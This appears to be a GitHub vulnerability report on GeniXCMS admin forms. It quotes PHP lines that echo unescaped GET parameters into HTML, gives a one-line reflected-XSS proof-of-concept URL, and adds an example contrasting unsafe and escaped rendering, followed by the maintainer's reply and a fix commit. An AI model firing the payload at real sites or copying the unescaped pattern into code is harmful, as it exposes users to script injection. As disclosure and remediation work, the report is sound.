1. `./gxadmin/inc/pages_form.php` line 68:

```php
<form action="index.php?page=pages&act=<?=$act?>&token=<?=$_GET['token'];?>" method="post" role="form" class="">
```

2. `./gxadmin/inc/posts_form.php` line 55:

```php
<form action="index.php?page=posts&act=<?=$act?>&token=<?=$_GET['token'];?>" method="post" role="form" class="">
```

3. `./gxadmin/inc/posts_form.php` line 25 (also line 55):

```php
($_GET['act'] == 'edit') ? $act = "edit&id={$_GET['id']}&token=".$token : $act = 'add';
```

4. `./gxadmin/inc/menus_form.php` line 79:

```php
<input type="text" name='id' class="form-control" value="<?=$menuid;?>" readonly >
```

5. `./gxadmin/inc/menus_form_edit.php` line 26:

```php
if (isset($_GET['token']) && Token::isExist($_GET['token'])) { $token = TOKEN; } else { $token = ''; }
```

and line 225:

```php
<input type="hidden" name="token" value="<?=$token;?>">
```

6. `./gxadmin/inc/menus_form_edit.php` line 18 (also line 104):

```php
if (isset($_GET['id'])) { $menuid = $_GET['id']; } else { $menuid = $data['menuid']; }
```

7. `./gxadmin/inc/user_form.php` line 93:

```php
<input type="hidden" name="token" value="<?=$_GET['token'];?>">
```

PoC:

`http://localhost/GeniXCMS/gxadmin/index.php?page=pages&act=add&token=%22%3E%3Csvg%20onload=alert(1)%3E`
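The snippets above all share one defect: a request parameter is written straight into an HTML attribute, so a value that contains `"` closes the attribute and whatever follows is parsed as markup. The following is an added example, not the reporter's PoC and not GeniXCMS code; it puts the unsafe pattern next to a hardened version. The helper names (`esc`, `tokenIsValid`, `renderFormUnsafe`, `renderFormSafe`) and the token values are assumptions made for the example; the project's real `Token` class and `TOKEN` constant are not used.

```php
<?php
// Added example (not GeniXCMS code): reflecting a request parameter safely.
// The report's pattern interpolates the raw $_GET['token'] into an attribute,
// so a value such as "><svg onload=alert(1)> terminates the attribute and the
// remainder is rendered as an element.

declare(strict_types=1);

/** Escape a string for use inside an HTML attribute or text node. */
function esc(string $value): string
{
    // ENT_QUOTES escapes both " and ' so the value cannot break out of either
    // attribute quoting style; ENT_SUBSTITUTE avoids returning '' on invalid
    // UTF-8, which would silently drop the token instead of failing loudly.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Hypothetical stand-in for the CSRF token check: accept only a candidate
 * that matches the server-side token, compared in constant time.
 */
function tokenIsValid(?string $candidate, string $serverToken): bool
{
    return is_string($candidate) && hash_equals($serverToken, $candidate);
}

/** Unsafe rendering: mirrors the pattern in pages_form.php / user_form.php. */
function renderFormUnsafe(string $act, string $token): string
{
    return '<form action="index.php?page=pages&act=' . $act . '&token=' . $token . '" method="post">'
         . '<input type="hidden" name="token" value="' . $token . '">'
         . '</form>';
}

/**
 * Hardened rendering: never echo the request-supplied token. Validate it,
 * then emit only the server-side value, escaped for the attribute context.
 * On validation failure an empty token is emitted so the later POST check
 * rejects the submission.
 */
function renderFormSafe(string $act, ?string $requestToken, string $serverToken): string
{
    $token = tokenIsValid($requestToken, $serverToken) ? $serverToken : '';
    // urlencode() for the query-string components, esc() for the attribute.
    $action = 'index.php?page=pages&act=' . urlencode($act) . '&token=' . urlencode($token);
    return '<form action="' . esc($action) . '" method="post">'
         . '<input type="hidden" name="token" value="' . esc($token) . '">'
         . '</form>';
}

// Constructed input: the report's payload as PHP sees it after URL decoding.
$serverToken  = 'constructed-server-token';
$requestToken = '"><svg onload=alert(1)>';

echo "Unsafe:\n" . renderFormUnsafe('add', $requestToken) . "\n\n";
echo "Safe:\n"   . renderFormSafe('add', $requestToken, $serverToken) . "\n";
```

Run it with `php example.php`: the unsafe output contains a literal `<svg onload=alert(1)>` element outside the attribute, while the safe output contains only an escaped empty token, because the attacker-controlled value never reaches the markup at all. Escaping is the backstop; the primary fix is to stop reflecting `$_GET['token']` and render the server-side token instead, which is what the `Token::isExist` branch at `menus_form_edit.php` line 26 already moves toward.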
Thank you @Xyntax. Yeah, there are still more issues available and I'm happy to know them. I'm still focusing on the features recently. I'll fix it soon.
Referenced commit abfbb61 (semplon): Security Fix #61 #62 #63 #65 #66 #67